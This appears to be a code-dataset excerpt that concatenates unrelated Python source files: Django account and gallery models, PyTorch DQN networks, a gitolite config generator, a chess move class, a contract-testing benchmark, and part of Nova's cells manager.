user.set_password(password)
user.save(using=self._db)
return user
def create_user(self, email, username, password=None, **extra_fields):
return self._create_user(email, username, password, False, False,
**extra_fields)
def create_superuser(self, email, username, password=None, **extra_fields):
return self._create_user(email, username, password, True, True,
**extra_fields)
@python_2_unicode_compatible
class User(AbstractBaseUser, PermissionsMixin):
username_validator = UnicodeUsernameValidator()
username = models.CharField(
_('username'),
max_length=150,
unique=True,
help_text=_('Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.'),
validators=[username_validator],
error_messages={
'unique': _("A user with that username already exists."),
},
)
first_name = models.CharField(_('first name'), max_length=30, blank=True)
last_name = models.CharField(_('last name'), max_length=150, blank=True)
email = models.EmailField(_('email address'), unique=True, null=True,
blank=True)
is_staff = models.BooleanField(
_('staff status'),
default=False,
help_text=_('Designates whether the user can log into this admin site.'),
)
is_active = models.BooleanField(
_('active'),
default=True,
help_text=_(
'Designates whether this user should be treated as active. '
'Unselect this instead of deleting accounts.'
),
)
date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
organization = models.CharField(_('Organization'), blank=True, max_length=255)
organization_url = models.URLField(_('Organization URL'), blank=True, max_length=255)
private = models.BooleanField(_('Private'), default=False)
address = models.TextField(_('Address'), blank=True)
terms = models.BooleanField(_('Accepted Terms'), default=True)
newsletter = models.BooleanField(_('Wants Newsletter'), default=False)
is_expert = models.BooleanField(_('Expert'), help_text=_('Unlocks shortcuts and other experienced user features'), default=False)
is_trusted = models.BooleanField(_('Trusted'), default=False)
is_blocked = models.BooleanField(_('Blocked'), default=False)
is_deleted = models.BooleanField(_('deleted'), default=False,
help_text=_('Designates whether this user was deleted.'))
date_left = models.DateTimeField(_('date left'), default=None, null=True, blank=True)
objects = UserManager()
USERNAME_FIELD = 'email'
EMAIL_FIELD = 'email'
REQUIRED_FIELDS = ['username']
def __str__(self):
if self.email is None:
return self.username
return self.email
def get_absolute_url(self):
if self.private:
return ""
return reverse('account-profile', kwargs={'slug': self.username})
def get_full_name(self):
"""
Returns the first_name plus the last_name, with a space in between.
"""
full_name = '%s %s' % (self.first_name, self.last_name)
return full_name.strip()
def get_short_name(self):
"Returns the short name for the user."
return self.first_name
def get_dict(self, fields):
d = get_dict(self, fields)
d['request_count'] = self.foirequest_set.all().count()
return d
def trusted(self):
return self.is_trusted or self.is_staff or self.is_superuser
@classmethod
def export_csv(cls, queryset):
fields = (
"id", "first_name", "last_name", "email",
"organization", "organization_url", "private",
"date_joined", "is_staff",
"address", "terms", "newsletter",
"request_count",
)
return export_csv(queryset, fields)
def as_json(self):
return json.dumps({
'id': self.id,
'first_name': self.first_name,
'last_name': self.last_name,
'address': self.address,
'private': self.private,
'email': self.email,
'organization': self.organization
})
def display_name(self):
if self.private:
return str(_("<< Name Not Public >>"))
else:
if self.organization:
return '%s (%s)' % (self.get_full_name(), self.organization)
else:
return self.get_full_name()
def get_autologin_url(self, url):
from .services import AccountService
service = AccountService(self)
return service.get_autologin_url(url)
def get_password_change_form(self, *args, **kwargs):
from django.contrib.auth.forms import SetPasswordForm
return SetPasswordForm(self, *args, **kwargs)
def get_change_form(self, *args, **kwargs):
from froide.account.forms import UserChangeForm
return UserChangeForm(self, *args, **kwargs)
class Application(AbstractApplication):
description = models.TextField(blank=True)
homepage = models.CharField(max_length=255, blank=True)
image_url = models.CharField(max_length=255, blank=True)
auto_approve_scopes = models.TextField(blank=True)
created = models.DateTimeField(auto_now_add=True, null=True)
updated = models.DateTimeField(auto_now=True, null=True)
def allows_grant_type(self, *grant_types):
# only allow GRANT_AUTHORIZATION_CODE, GRANT_IMPLICIT
# regardless of application setting
return bool(set([
AbstractApplication.GRANT_AUTHORIZATION_CODE,
AbstractApplication.GRANT_IMPLICIT
]) & set(grant_types))
def can_auto_approve(self, scopes):
"""
Check if the token allows the provided scopes
:param scopes: An iterable containing the scopes to check
"""
if not scopes:
return True
provided_scopes = set(self.auto_approve_scopes.split())
resource_scopes = set(scopes)
return resource_scopes.issubset(provided_scopes)
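# Illustrative check (not part of the original file): scope auto-approval is a pure set
# comparison, so it can be exercised on an in-memory Application without touching the
# database.  The scope strings are assumptions for demonstration only: with
# auto_approve_scopes = "read write", ["read"] is auto-approved but ["read", "admin"]
# is not.
def _auto_approve_example(application):
    application.auto_approve_scopes = "read write"
    return (
        application.can_auto_approve(["read"]),           # True
        application.can_auto_approve(["read", "admin"]),  # False
    )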
import torch
import torch.nn as nn
import torch.nn.functional as F
class Flatten(nn.Module):
def forward(self, input):
return input.view(input.size(0), -1)
class DQN(nn.Module):
def __init__(self, n_action_space):
super(DQN, self).__init__()
self.s1 = nn.Sequential(
nn.Conv2d(1, 64, (1, 1)),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 128, (2, 2)),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Conv2d(128, 128, (2, 2)),
nn.BatchNorm2d(128),
nn.ReLU(),
Flatten(),
nn.Linear(512, 32),
nn.ReLU(),
)
        # Single linear action head. torch.nn provides no NoisyLinear layer, so the
        # original duplicate assignment to a NoisyLinear head has been removed.
        self.act = nn.Linear(32, n_action_space)
def forward(self, x):
x = self.s1(x)
return self.act(x)
def predict(self, x):
return self.forward(x).detach().sort(dim=1, descending=True)
class Combine(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size):
super(Combine, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size) #, groups=in_channels)
self.bn = nn.BatchNorm2d(out_channels)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
return self.relu(x)
class Concat(nn.Module):
def __init__(self, in_channels, out_channels):
super(Concat, self).__init__()
self.c1 = Combine(in_channels, out_channels, (2, 1))
self.c2 = Combine(in_channels, out_channels, (1, 2))
self.flat = Flatten()
def forward(self, x):
x1 = self.flat(self.c1(x))
x2 = self.flat(self.c2(x))
return torch.cat([x1, x2], 1)
class SupervisedModel(nn.Module):
def __init__(self, n_action_space):
super(SupervisedModel, self).__init__()
self.c1 = Combine(1, 256, (2, 1))
self.c2 = Combine(1, 256, (1, 2))
self.concat1 = Concat(256, 1024)
self.concat2 = Concat(256, 1024)
self.l1 = nn.Linear(34816, 4096)
self.l2 = nn.Linear(4096, 1024)
self.l3 = nn.Linear(1024, 32)
self.act = nn.Linear(32, n_action_space)
def forward(self, x):
x1 = self.c1(x)
x2 = self.c2(x)
x1 = self.concat1(x1)
x2 = self.concat2(x2)
x = torch.cat([x1, x2], 1)
x = F.relu(self.l1(x))
x = F.relu(self.l2(x))
x = F.relu(self.l3(x))
return self.act(x)
def predict(self, x):
return self.forward(x).detach().sort(dim=1, descending=True)
def get_argmax(self, x):
return self.forward(x)[0].detach().argmax().item()
class DuelingDQN(nn.Module):
def __init__(self, n_action_space):
super(DuelingDQN, self).__init__()
self.feature = nn.Sequential(
nn.Conv2d(1, 64, (1, 1)),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 128, (2, 2)),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Conv2d(128, 128, (2, 2)),
nn.BatchNorm2d(128),
nn.ReLU(),
Flatten(),
nn.Linear(512, 128),
nn.ReLU(),
)
self.value = nn.Sequential(
nn.Linear(128, 32),
nn.ReLU(),
nn.Linear(32, 1)
)
self.advantage = nn.Sequential(
nn.Linear(128, 128),
nn.ReLU(),
nn.Linear(128, n_action_space)
)
def forward(self, x):
x = self.feature(x)
value = self.value(x)
advantage = self.advantage(x)
return value + advantage - advantage.mean()
def predict(self, x):
return self.forward(x).detach().sort(dim=1, descending=True)
class XceptionLikeDuelingDQN(nn.Module):
def __init__(self, n_action_space):
super(XceptionLikeDuelingDQN, self).__init__()
self.feature = nn.Sequential(
nn.Conv2d(1, 1024, (1, 1)),
nn.BatchNorm2d(1024),
nn.ReLU(),
XceptionLike(1024),
Flatten(),
nn.Linear(27648, 2048),
nn.ReLU(),
nn.Linear(2048, 2048),
nn.ReLU(),
nn.Linear(2048, 1024),
nn.ReLU(),
)
self.value = nn.Sequential(
nn.Linear(1024, 32),
nn.ReLU(),
nn.Linear(32, 1)
)
self.advantage = nn.Sequential(
nn.Linear(1024, 128),
nn.ReLU(),
nn.Linear(128, n_action_space)
)
def forward(self, x):
x = self.feature(x)
value = self.value(x)
advantage = self.advantage(x)
return value + advantage - advantage.mean()
def predict(self, x):
return self.forward(x).detach().sort(dim=1, descending=True)
class XceptionLike(nn.Module):
def __init__(self, in_channels):
super(XceptionLike, self).__init__()
self.branch2x2 = BasicConv2d(in_channels, 1024, kernel_size=2, groups=in_channels)
self.branch3x3 = BasicConv2d(in_channels, 1024, kernel_size=3, groups=in_channels, padding=1)
self.maxpool3x3 = nn.MaxPool2d(2, 1)
self.branch4x4 = BasicConv2d(in_channels, 1024, kernel_size=4, groups=in_channels, padding=1)
def forward(self, x):
branch2x2 = self.branch2x2(x)
branch3x3 = self.branch3x3(x)
branch3x3 = self.maxpool3x3(branch3x3)
branch4x4 = self.branch4x4(x)
outputs = [branch2x2, branch3x3, branch4x4]
return torch.cat(outputs, 1)
class BasicConv2d(nn.Module):
def __init__(self, in_channels, out_channels, **kwargs):
super(BasicConv2d, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)
self.bn = nn.BatchNorm2d(out_channels, eps=0.001)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
return F.relu(x, inplace=True)
# https://github.com/Kaixhin/Rainbow/blob/master/model.py#L9-L46
# Factorised NoisyLinear layer with bias
class NoisyLinear(nn.Module):
def __init__(self, in_features, out_features, std_init=0.4):
super(NoisyLinear, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.std_init = std_init
self.weight_mu = nn.Parameter(torch.empty(out_features, in_features))
self.weight_sigma = nn.Parameter(torch.empty(out_features, in_features))
# Notice self.weight_epsilon in `forward`
self.register_buffer('weight_epsilon', torch.empty(out_features, in_features))
self.bias_mu = nn.Parameter(torch.empty(out_features))
self.bias_sigma = nn.Parameter(torch.empty(out_features))
self.register_buffer('bias_epsilon', torch.empty(out_features))
self.reset_parameters()
self.reset_noise()
def reset_parameters(self):
mu_range = 1 / math.sqrt(self.in_features)
self.weight_mu.data.uniform_(-mu_range, mu_range)
self.weight_sigma.data.fill_(self.std_init / math.sqrt(self.in_features))
self.bias_mu.data.uniform_(-mu_range, mu_range)
self.bias_sigma.data.fill_(self.std_init / math.sqrt(self.out_features))
def _scale_noise(self, size):
x = torch.randn(size)
return x.sign().mul_(x.abs().sqrt_())
def reset_noise(self):
epsilon_in = self._scale_noise(self.in_features)
epsilon_out = self._scale_noise(self.out_features)
self.weight_epsilon.copy_(epsilon_out.ger(epsilon_in))
self.bias_epsilon.copy_(epsilon_out)
def forward(self, input):
if self.training:
return F.linear(input, self.weight_mu + self.weight_sigma * self.weight_epsilon,
self.bias_mu + self.bias_sigma * self.bias_epsilon)
else:
return F.linear(input, self.weight_mu, self.bias_mu)
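
# Minimal smoke test, not part of the original module. Assumption: these networks
# expect a single-channel 4x4 board (e.g. a 2048-style grid); that input size is what
# makes the flattened feature sizes (512 for DQN/DuelingDQN, 34816 for SupervisedModel,
# 27648 for XceptionLikeDuelingDQN) line up with the Linear layers above.
if __name__ == "__main__":
    n_actions = 4
    board = torch.zeros(1, 1, 4, 4)  # (batch, channels, height, width)
    for net_cls in (DQN, DuelingDQN):
        net = net_cls(n_actions)
        net.eval()  # use BatchNorm running stats / NoisyLinear mean weights
        values, actions = net.predict(board)
        print(net_cls.__name__, values.shape, actions.shape)  # each torch.Size([1, 4])
    # SupervisedModel and XceptionLikeDuelingDQN expose the same predict() interface,
    # just with much larger fully connected layers.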
| StarcoderdataPython |
1621099 | from brigitte.repositories.models import Repository
from brigitte.accounts.models import SshPublicKey
from brigitte.repositories.backends.base import ShellMixin
import os
def generate_gitolite_conf(file_path):
file_obj = open(file_path, 'w')
lines = [
'repo gitolite-admin\n',
'\tRW+ = gitolite\n',
]
def generate_access_rule(repo_user, key):
if repo_user.can_write and key.can_write:
return 'RW+'
elif repo_user.can_read and key.can_read:
return 'R'
for repo in Repository.objects.filter(repo_type='git'):
keys = []
if not repo.private:
keys.append('\tR\t= daemon\n')
for user in repo.repositoryuser_set.all():
for key in user.user.sshpublickey_set.all():
keys.append('\t%s\t= key-%s\n' % (generate_access_rule(user, key), key.pk))
if len(keys) > 0:
lines.append('\n')
lines.append('repo\t%s\n' % repo.short_path[:-4])
lines.extend(keys)
file_obj.writelines(lines)
file_obj.close()
def export_public_keys(keydir_path):
for key in os.listdir(keydir_path):
key_path = os.path.join(keydir_path, key)
if os.path.isfile(key_path) and key != 'gitolite.pub':
os.unlink(key_path)
for pubkey in SshPublicKey.objects.all():
key_obj = open(os.path.join(keydir_path, 'key-%s.pub' % pubkey.pk), 'w')
key_obj.write('%s\n' % pubkey.key)
key_obj.close()
def update_gitolite_repo(gitolite_path):
commands = [
'git add .',
'git commit -q -m updated -a',
'git push -q',
]
shell = ShellMixin()
for command in commands:
shell.exec_command(['/bin/sh', '-c', 'cd %s; %s' % (gitolite_path, command)])
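
# Example wiring, not part of the original module; the gitolite-admin path below is an
# assumption. The intended flow is: regenerate gitolite.conf and the key directory from
# the database, then commit and push the gitolite-admin checkout so gitolite applies it.
if __name__ == '__main__':
    gitolite_admin = '/home/git/gitolite-admin'  # hypothetical checkout location
    generate_gitolite_conf(os.path.join(gitolite_admin, 'conf', 'gitolite.conf'))
    export_public_keys(os.path.join(gitolite_admin, 'keydir'))
    update_gitolite_repo(gitolite_admin)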
| StarcoderdataPython |
185255 | from Piece import Piece, Pawn, Rook, Knight, Bishop, Queen, King
class Move(object):
"""Contains all the move methods"""
def __init__(self):
pass
def set_new_game(self):
"""
Initializes pieces for a new chess game.
Uses two for loops and if/else statements to set the pieces.
"""
board = []
A, B, C, D, E, F, G, H = range(8), range(8), range(8), range(8), range(8), range(8), range(8), range(8) # Feels unpythonic but can't do A = B = C = ... = range(8) since lists are mutable
board.extend([A, B, C, D, E, F, G, H])
for row in xrange(8):
for col in xrange(8):
if col == 1:
board[row][col] = Pawn(False, 'White')
elif col == 6:
board[row][col] = Pawn(False, 'Black')
elif col in range(2,7):
board[row][col] = Piece()
elif col == 0:
if row == 0 or row == 7:
board[row][col] = Rook(False, 'White')
elif row == 1 or row == 6:
board[row][col] = Knight(False, 'White')
elif row == 2 or row == 5:
board[row][col] = Bishop(False, 'White')
elif row == 3:
board[row][col] = Queen(False, 'White')
else:
board[row][col] = King(False, 'White')
else:
if row == 0 or row == 7:
board[row][col] = Rook(False, 'Black')
elif row == 1 or row == 6:
board[row][col] = Knight(False, 'Black')
elif row == 2 or row == 5:
board[row][col] = Bishop(False, 'Black')
elif row == 3:
board[row][col] = Queen(False, 'Black')
else:
board[row][col] = King(False, 'Black')
return board
def move(self):
"""Consolidates move methods"""
wanted = None
while wanted is None:
wanted = self.get_move()
piece = self.main_board[wanted[0][0]][wanted[0][1]]
if isinstance(piece, Pawn): # If the piece to be moved is a pawn
piece.moved = True
if abs(wanted[0][1] - wanted[1][1]) == 2: # If the pawn moved two spaces on its first move
piece.double_step = True
if isinstance(piece, Rook) or isinstance(piece, King): # Need to track for castling
piece.moved = True
self.apply_move(wanted[0], wanted[1])
def get_move(self):
"""
Prompts user for desired move. Only using board coordinates for now.
        Stores the from and to coordinates in tuples and returns a tuple of these tuples.
Eg. A1 is parsed as (0, 0)
"""
piece_from = tuple(i for i in raw_input("From?"))
piece_to = tuple(i for i in raw_input("To?"))
piece_from, piece_to = self.anum_to_cart(piece_from, piece_to) # Converts user input into numbers
legal_moves = self.get_legal(piece_from)
if piece_to not in legal_moves:
print "Move is not legal. Try again."
return None
else:
location = self.cart_to_anum(piece_from)
destination = self.cart_to_anum(piece_to)
print "Moving from {0} to {1}".format(location, destination)
return (piece_from, piece_to)
def apply_move(self, location, destination):
"""Rudimentary move function for now"""
self.main_board[destination[0]][destination[1]] = self.main_board[location[0]][location[1]]
self.main_board[location[0]][location[1]] = Piece() # Makes old location empty
def get_legal(self, piece):
"""Gets list of legal moves"""
legal = self.main_board[piece[0]][piece[1]].move_set(piece, self.main_board)
return legal
def anum_to_cart(self, piece_from, piece_to):
"""
Converts board coordinate input--eg. 'A5' to cartesian coordinates.
Takes the two movement tuples, converts, then returns a single tuple
"""
atoi = {
'A' : 0,
'B' : 1,
'C' : 2,
'D' : 3,
'E' : 4,
'F' : 5,
'G' : 6,
'H' : 7
}
piece_from = (atoi[piece_from[0]], int(piece_from[1]) - 1) # -1 since counting starts from 0 not 1
piece_to = (atoi[piece_to[0]], int(piece_to[1]) - 1)
return (piece_from, piece_to)
def cart_to_anum(self, piece):
"""Converts from array coordinates to board coordinates for testing purposes"""
itoa = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']
piece = "".join((itoa[piece[0]], str(piece[1] + 1)))
return piece
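
# Small sanity check, not part of the original class: set up the starting board and
# exercise the pure coordinate helpers (no user input required). Python 2 syntax to
# match the rest of this file (raw_input, xrange).
if __name__ == '__main__':
    game = Move()
    game.main_board = game.set_new_game()  # move() expects main_board to be set
    print len(game.main_board), len(game.main_board[0])  # 8 8
    print game.anum_to_cart(('A', '2'), ('A', '3'))      # ((0, 1), (0, 2))
    print game.cart_to_anum((0, 1))                       # A2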
| StarcoderdataPython |
38661 | #!/usr/bin/env python3
"""Benchmark icontract against deal when used together with hypothesis."""
import os
import sys
import timeit
from typing import List
import deal
import dpcontracts
import hypothesis
import hypothesis.extra.dpcontracts
import hypothesis.strategies
import icontract
import tabulate
import icontract_hypothesis
def benchmark_icontract_assume_preconditions(arg_count: int = 1) -> None:
"""Benchmark the Hypothesis testing with icontract and rejection sampling."""
count = 0
if arg_count == 1:
@icontract.require(lambda a: a > 0)
def some_func(a: int) -> None:
nonlocal count
count += 1
pass
assume_preconditions = icontract_hypothesis.make_assume_preconditions(some_func)
@hypothesis.settings(
suppress_health_check=(hypothesis.HealthCheck.filter_too_much,)
)
@hypothesis.given(a=hypothesis.strategies.integers())
def execute(a: int) -> None:
assume_preconditions(a)
some_func(a)
elif arg_count == 2:
@icontract.require(lambda a: a > 0)
@icontract.require(lambda b: b > 0)
def some_func(a: int, b: int) -> None:
nonlocal count
count += 1
pass
assume_preconditions = icontract_hypothesis.make_assume_preconditions(some_func)
@hypothesis.settings(
suppress_health_check=(hypothesis.HealthCheck.filter_too_much,)
)
@hypothesis.given(
a=hypothesis.strategies.integers(), b=hypothesis.strategies.integers()
)
def execute(a: int, b: int) -> None:
assume_preconditions(a=a, b=b)
some_func(a, b)
elif arg_count == 3:
@icontract.require(lambda a: a > 0)
@icontract.require(lambda b: b > 0)
@icontract.require(lambda c: c > 0)
def some_func(a: int, b: int, c: int) -> None:
nonlocal count
count += 1
pass
assume_preconditions = icontract_hypothesis.make_assume_preconditions(some_func)
@hypothesis.settings(
suppress_health_check=(hypothesis.HealthCheck.filter_too_much,)
)
@hypothesis.given(
a=hypothesis.strategies.integers(),
b=hypothesis.strategies.integers(),
c=hypothesis.strategies.integers(),
)
def execute(a: int, b: int, c: int) -> None:
assume_preconditions(a=a, b=b, c=c)
some_func(a, b, c)
else:
raise NotImplementedError("arg_count {}".format(arg_count))
execute()
# Assert the count of function executions for fair tests
assert count == 100
def benchmark_icontract_inferred_strategy(arg_count: int = 1) -> None:
"""Benchmark the Hypothesis testing with icontract and inferred search strategies."""
count = 0
if arg_count == 1:
@icontract.require(lambda a: a > 0)
def some_func(a: int) -> None:
nonlocal count
count += 1
pass
elif arg_count == 2:
@icontract.require(lambda a: a > 0)
@icontract.require(lambda b: b > 0)
def some_func(a: int, b: int) -> None:
nonlocal count
count += 1
pass
elif arg_count == 3:
@icontract.require(lambda a: a > 0)
@icontract.require(lambda b: b > 0)
@icontract.require(lambda c: c > 0)
def some_func(a: int, b: int, c: int) -> None:
nonlocal count
count += 1
pass
else:
raise NotImplementedError("arg_count {}".format(arg_count))
icontract_hypothesis.test_with_inferred_strategy(some_func)
# Assert the count of function executions for fair tests
assert count == 100
def benchmark_dpcontracts(arg_count: int = 1) -> None:
"""Benchmark the Hypothesis testing with dpcontracts."""
count = 0
if arg_count == 1:
@dpcontracts.require("some dummy contract", lambda args: args.a > 0)
def some_func(a: int) -> None:
nonlocal count
count += 1
pass
@hypothesis.settings(
suppress_health_check=(hypothesis.HealthCheck.filter_too_much,)
)
@hypothesis.given(a=hypothesis.strategies.integers())
def execute(a: int) -> None:
hypothesis.extra.dpcontracts.fulfill(some_func)(a)
elif arg_count == 2:
@dpcontracts.require("some dummy contract", lambda args: args.a > 0)
@dpcontracts.require("some dummy contract", lambda args: args.b > 0)
def some_func(a: int, b: int) -> None:
nonlocal count
count += 1
pass
@hypothesis.settings(
suppress_health_check=(hypothesis.HealthCheck.filter_too_much,)
)
@hypothesis.given(
a=hypothesis.strategies.integers(), b=hypothesis.strategies.integers()
)
def execute(a: int, b: int) -> None:
hypothesis.extra.dpcontracts.fulfill(some_func)(a, b)
elif arg_count == 3:
@dpcontracts.require("some dummy contract", lambda args: args.a > 0)
@dpcontracts.require("some dummy contract", lambda args: args.b > 0)
@dpcontracts.require("some dummy contract", lambda args: args.c > 0)
def some_func(a: int, b: int, c: int) -> None:
nonlocal count
count += 1
pass
@hypothesis.settings(
suppress_health_check=(hypothesis.HealthCheck.filter_too_much,)
)
@hypothesis.given(
a=hypothesis.strategies.integers(),
b=hypothesis.strategies.integers(),
c=hypothesis.strategies.integers(),
)
def execute(a: int, b: int, c: int) -> None:
hypothesis.extra.dpcontracts.fulfill(some_func)(a, b, c)
else:
raise NotImplementedError("arg_count {}".format(arg_count))
execute()
# Assert the count of function executions for fair tests
assert count == 100
def benchmark_deal(arg_count: int = 1) -> None:
"""Benchmark the Hypothesis testing with deal."""
count = 0
if arg_count == 1:
@deal.pre(lambda _: _.a > 0)
def some_func(a: int) -> None:
nonlocal count
count += 1
pass
for case in deal.cases(some_func, count=100):
case()
elif arg_count == 2:
@deal.pre(lambda _: _.a > 0)
@deal.pre(lambda _: _.b > 0)
def some_func(a: int, b: int) -> None:
nonlocal count
count += 1
pass
for case in deal.cases(some_func, count=100):
case()
elif arg_count == 3:
@deal.pre(lambda _: _.a > 0)
@deal.pre(lambda _: _.b > 0)
@deal.pre(lambda _: _.c > 0)
def some_func(a: int, b: int, c: int) -> None:
nonlocal count
count += 1
pass
for case in deal.cases(some_func, count=100):
case()
else:
raise NotImplementedError("arg_count {}".format(arg_count))
assert count == 100
def writeln_utf8(text: str = "") -> None:
"""
Write the text to STDOUT using UTF-8 encoding followed by a new-line character.
We can not use ``print()`` as we can not rely on the correct encoding in Windows.
See: https://stackoverflow.com/questions/31469707/changing-the-locale-preferred-encoding-in-python-3-in-windows
"""
sys.stdout.buffer.write(text.encode("utf-8"))
sys.stdout.buffer.write(os.linesep.encode("utf-8"))
def measure_functions() -> None:
# yapf: disable
funcs = [
'benchmark_icontract_inferred_strategy',
'benchmark_icontract_assume_preconditions',
'benchmark_dpcontracts',
'benchmark_deal',
]
# yapf: enable
durations = [0.0] * len(funcs)
number = 10
for arg_count in [1, 2, 3]:
for i, func in enumerate(funcs):
duration = timeit.timeit(
"{}(arg_count={})".format(func, arg_count),
setup="from __main__ import {}".format(func),
number=number,
)
durations[i] = duration
table = [] # type: List[List[str]]
for func, duration in zip(funcs, durations):
# yapf: disable
table.append([
'`{}`'.format(func),
'{:.2f} s'.format(duration),
'{:.2f} ms'.format(duration * 1000 / number),
'{:.0f}%'.format(duration * 100 / durations[0])
])
# yapf: enable
# yapf: disable
table_str = tabulate.tabulate(
table,
headers=['Case', 'Total time', 'Time per run', 'Relative time per run'],
colalign=('left', 'right', 'right', 'right'),
tablefmt='rst')
# yapf: enable
writeln_utf8()
writeln_utf8("Argument count: {}".format(arg_count))
writeln_utf8()
writeln_utf8(table_str)
if __name__ == "__main__":
writeln_utf8("Benchmarking Hypothesis testing:")
writeln_utf8("")
measure_functions()
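
# Standalone usage sketch (illustrative only; mirrors the benchmark cases above):
# outside of a timing harness, a contracted function can be tested either with an
# inferred search strategy or with rejection sampling via assume_preconditions, e.g.:
#
#   @icontract.require(lambda x: 0 < x < 100)
#   def reciprocal(x: int) -> float:
#       return 1 / x
#
#   icontract_hypothesis.test_with_inferred_strategy(reciprocal)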
| StarcoderdataPython |
1794796 | from django.db import models
# Create your models here.
class Location(models.Model):
location_name = models.CharField(max_length = 25)
def __str__(self):
return self.location_name
def save_location(self):
self.save()
def delete_location(location_id):
Location.objects.filter(id = location_id).delete()
def update_location(location_id, location):
Location.objects.filter(id = location_id).update(location_name = location)
class Category(models.Model):
category_name = models.CharField(max_length = 50)
def __str__(self):
return self.category_name
def save_category(self):
self.save()
def delete_category(category_id):
Category.objects.filter(id = category_id).delete()
def update_category(category_id, category):
Category.objects.filter(id = category_id).update(category_name = category)
class Photographer(models.Model):
names = models.CharField(max_length = 50)
email = models.EmailField(blank = True)
ig = models.CharField(max_length = 20, blank = True)
phone_number = models.CharField(max_length = 10,blank =True)
def __str__(self):
return self.names
def save_photographer(self):
self.save()
def delete_photographer(photographer_id):
Photographer.objects.filter(id = photographer_id).delete()
class Image(models.Model):
image_path = models.ImageField(upload_to = 'images/')
name = models.CharField(max_length = 50)
description = models.TextField(blank = True)
location = models.ForeignKey(Location, blank=True)
category = models.ForeignKey(Category, blank=True)
photographer = models.ForeignKey(Photographer)
def __str__(self):
return self.name
def save_image(self):
self.save()
def delete_image(image_id):
Image.objects.filter(id = image_id).delete()
def update_image(image_id, path):
Image.objects.filter(id = image_id).update(image_path = path)
def get_image_by_id(image_id):
image = Image.objects.get(pk = image_id)
return image
@classmethod
def search_image(cls, search_category):
images = cls.objects.filter(category__category_name__icontains=search_category)
return images
@classmethod
def filter_by_location(cls):
images = cls.objects.order_by('location')
return images
class Meta:
ordering = ['name']
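
# Usage sketch (illustrative; assumes a populated database and is not part of the
# original models):
#
#   landscapes = Image.search_image('landscape')  # case-insensitive category match
#   by_place = Image.filter_by_location()         # all images ordered by location
#   photo = Image.get_image_by_id(1)
#   Image.update_image(1, 'images/new_path.jpg')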
| StarcoderdataPython |
3277683 | # Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

"""
Cells Service Manager
"""
import datetime
import time

from oslo_log import log as logging
import oslo_messaging
from oslo_service import periodic_task
from oslo_utils import importutils
from oslo_utils import timeutils
import six
from six.moves import range

from nova.cells import messaging
from nova.cells import state as cells_state
from nova.cells import utils as cells_utils
import nova.conf
from nova import context
from nova import exception
from nova.i18n import _LW
from nova import manager
from nova import objects
from nova.objects import base as base_obj
from nova.objects import instance as instance_obj


CONF = nova.conf.CONF

LOG = logging.getLogger(__name__)


class CellsManager(manager.Manager):
    """The nova-cells manager class. This class defines RPC
    methods that the local cell may call. This class is NOT used for
    messages coming from other cells. That communication is
    driver-specific.

    Communication to other cells happens via the nova.cells.messaging module.
    The MessageRunner from that module will handle routing the message to
    the correct cell via the communications driver. Most methods below
    create 'targeted' (where we want to route a message to a specific cell)
    or 'broadcast' (where we want a message to go to multiple cells)
    messages.

    Scheduling requests get passed to the scheduler class.
    """

    target = oslo_messaging.Target(version='1.37')

    def __init__(self, *args, **kwargs):
        LOG.warning(_LW('The cells feature of Nova is considered experimental '
                        'by the OpenStack project because it receives much '
                        'less testing than the rest of Nova. This may change '
                        'in the future, but current deployers should be aware '
                        'that the use of it in production right now may be '
                        'risky. Also note that cells does not currently '
                        'support rolling upgrades, it is assumed that cells '
                        'deployments are upgraded lockstep so n-1 cells '
                        'compatibility does not work.'))
        # Mostly for tests.
        cell_state_manager = kwargs.pop('cell_state_manager', None)
        super(CellsManager, self).__init__(service_name='cells',
                                           *args, **kwargs)
        if cell_state_manager is None:
            cell_state_manager = cells_state.CellStateManager
        self.state_manager = cell_state_manager()
        self.msg_runner = messaging.MessageRunner(self.state_manager)
        cells_driver_cls = importutils.import_class(
            CONF.cells.driver)
        self.driver = cells_driver_cls()
        self.instances_to_heal = iter([])

    def post_start_hook(self):
        """Have the driver start its servers for inter-cell communication.
        Also ask our child cells for their capacities and capabilities so
        we get them more quickly than just waiting for the next periodic
        update. Receiving the updates from the children will cause us to
        update our parents. If we don't have any children, just update
        our parents immediately.
        """
        # FIXME(comstud): There's currently no hooks when services are
        # stopping, so we have no way to stop servers cleanly.
        self.driver.start_servers(self.msg_runner)
        ctxt = context.get_admin_context()
        if self.state_manager.get_child_cells():
            self.msg_runner.ask_children_for_capabilities(ctxt)
            self.msg_runner.ask_children_for_capacities(ctxt)
        else:
            self._update_our_parents(ctxt)

    @periodic_task.periodic_task
    def _update_our_parents(self, ctxt):
        """Update our parent cells with our capabilities and capacity
        if we're at the bottom of the tree.
        """
        self.msg_runner.tell_parents_our_capabilities(ctxt)
        self.msg_runner.tell_parents_our_capacities(ctxt)

    @periodic_task.periodic_task
    def _heal_instances(self, ctxt):
        """Periodic task to send updates for a number of instances to
        parent cells.

        On every run of the periodic task, we will attempt to sync
        'CONF.cells.instance_update_num_instances' number of instances.
        When we get the list of instances, we shuffle them so that multiple
        nova-cells services aren't attempting to sync the same instances
        in lockstep.

        If CONF.cells.instance_update_at_threshold is set, only attempt
        to sync instances that have been updated recently. The CONF
        setting defines the maximum number of seconds old the updated_at
        can be. Ie, a threshold of 3600 means to only update instances
        that have modified in the last hour.
        """

        if not self.state_manager.get_parent_cells():
            # No need to sync up if we have no parents.
            return

